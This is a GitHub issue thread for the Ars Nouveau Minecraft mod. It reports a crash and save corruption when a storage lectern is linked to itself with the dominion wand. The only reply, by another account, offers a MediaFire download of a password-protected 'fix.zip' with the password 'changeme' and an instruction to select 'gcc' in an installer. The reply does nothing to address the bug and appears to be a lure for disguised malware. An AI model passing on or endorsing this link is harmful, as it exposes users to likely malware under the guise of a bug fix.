### ISSUE TITLE
[Crash] Linking storage lectern to itself crash and corrupt save

### ISSUE THREAD

**Issue by Freecks** [baileyholl/Ars-Nouveau#1401]
When trying to link a storage lectern to itself using dominion wand, the game enter an infinite loop and crash. Game then crash everytime the lectern is loaded and must be removed via an external map editor.
Should expect an in game message stating that this is not possible, mostly considering that it could easily happen by mistake with a double click.
Tested on neoforge instance with standalone Ars Nouveau (and dependencies) on last versions (21.1.31 and 1.21.0.5.0.11-all)

[crash-2024-08-28_12.15.51-server.txt](https://github.com/user-attachments/files/16781928/crash-2024-08-28_12.15.51-server.txt)

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
